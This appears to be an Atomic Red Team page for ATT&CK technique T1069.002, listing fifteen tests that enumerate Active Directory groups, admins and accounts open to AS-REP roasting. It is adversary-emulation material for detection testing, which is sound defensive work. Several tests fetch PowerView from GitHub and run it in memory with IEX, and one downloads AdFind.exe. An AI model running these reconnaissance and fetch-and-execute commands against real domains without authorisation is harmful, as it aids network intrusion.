T1069.002

Permission Groups Discovery: Domain Groups

Description from ATT&CK

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.

Atomic Tests

Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)

Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

Supported Platforms: windows

auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d

Inputs:

None

Attack Commands: Run with command_prompt!

net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain

Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)

Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

Supported Platforms: windows

auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7

Inputs:

Name	Description	Type	Default Value
user	User to identify what groups a user is a member of	string	$env:USERNAME

Attack Commands: Run with powershell!

get-ADPrincipalGroupMembership #{user} | select name

Atomic Test #3 - Elevated group enumeration using net group (Domain)

Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

Supported Platforms: windows

auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37

Inputs:

None

Attack Commands: Run with command_prompt!

net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
net group /domai "Domain Admins"

Atomic Test #4 - Find machines where user has local admin access (PowerView)

Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.

Supported Platforms: windows

auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose

Atomic Test #5 - Find local admins on all machines in domain (PowerView)

Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.

Supported Platforms: windows

auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose

Atomic Test #6 - Find Local Admins via Group Policy (PowerView)

takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.

Supported Platforms: windows

auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a

Inputs:

Name	Description	Type	Default Value
computer_name	hostname of the computer to analyze	path	$env:COMPUTERNAME

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"

Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)

When successful, accounts that do not require kerberos pre-auth will be returned

Supported Platforms: windows

auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b

Inputs:

None

Attack Commands: Run with powershell!

get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}

Dependencies: Run with powershell!

Description: Computer must be domain joined.

Check Prereq Commands:

if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

Write-Host Joining this computer to a domain must be done manually.

Description: Requires the Active Directory module for powershell to be installed.

Check Prereq Commands:

if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}

Get Prereq Commands:

Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"

Atomic Test #8 - Adfind - Query Active Directory Groups

Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Supported Platforms: windows

auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274

Inputs:

None

Attack Commands: Run with command_prompt!

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group)

Dependencies: Run with powershell!

Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)

Check Prereq Commands:

if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}

Get Prereq Commands:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"

Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup

The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps

Supported Platforms: windows

auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8

Inputs:

None

Attack Commands: Run with powershell!

Get-AdGroup -Filter *

Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher

The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/

Supported Platforms: windows

auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0

Inputs:

None

Attack Commands: Run with powershell!

([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()

Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)

When successful, accounts that do not require kerberos pre-auth will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

Supported Platforms: windows

auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8

Inputs:

None

Attack Commands: Run with powershell!

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Dependencies: Run with powershell!

Description: Computer must be domain joined.

Check Prereq Commands:

if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

Write-Host Joining this computer to a domain must be done manually.

Description: Requires the Active Directory module for powershell to be installed.

Check Prereq Commands:

if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}

Get Prereq Commands:

Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"

Atomic Test #12 - Get-DomainGroupMember with PowerView

Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.

Supported Platforms: windows

auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"

Atomic Test #13 - Get-DomainGroup with PowerView

Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.

Supported Platforms: windows

auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose

Atomic Test #14 - Active Directory Enumeration with LDIFDE

Output information from Active Directory to a specified file. Ldifde is a CLI tool for creating, modifying and deleting directory objects. The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

Supported Platforms: windows

auto_generated_guid: 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784

Inputs:

Name	Description	Type	Default Value
output_path	Path to the file that ldifde will output	path	C:\Windows\temp
output_file	The filename to be created by ldifde	string	atomic_ldifde.txt

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

ldifde.exe -f #{output_path}\#{output_file} -p subtree

Cleanup Commands:

del #{output_path}\#{output_file}

Dependencies: Run with powershell!

Description: PowerShell ActiveDirectory Module must be installed

Check Prereq Commands:

Try {
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
    exit 0
}
Catch {
    exit 1
}

Get Prereq Commands:

if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
  Install-WindowsFeature RSAT-AD-PowerShell
}

Atomic Test #15 - Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS

Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory

Supported Platforms: linux

auto_generated_guid: d58d749c-4450-4975-a9e9-8b1d562755c2

Inputs:

Name	Description	Type	Default Value
domain	The domain to be tested	string	example
top_level_domain	The top level domain (.com, .test, .remote, etc… following domain, minus the .)	string	com
user	username@domain of a user	string	user@example.com
password	password of the user referenced inside user	string	s3CurePssw0rD!

Attack Commands: Run with sh!

ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn 

Dependencies: Run with sh!

Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch

Check Prereq Commands:

which ldapsearch

Get Prereq Commands:

echo missing ldapsearch command; exit 1

source

Twitter Facebook LinkedIn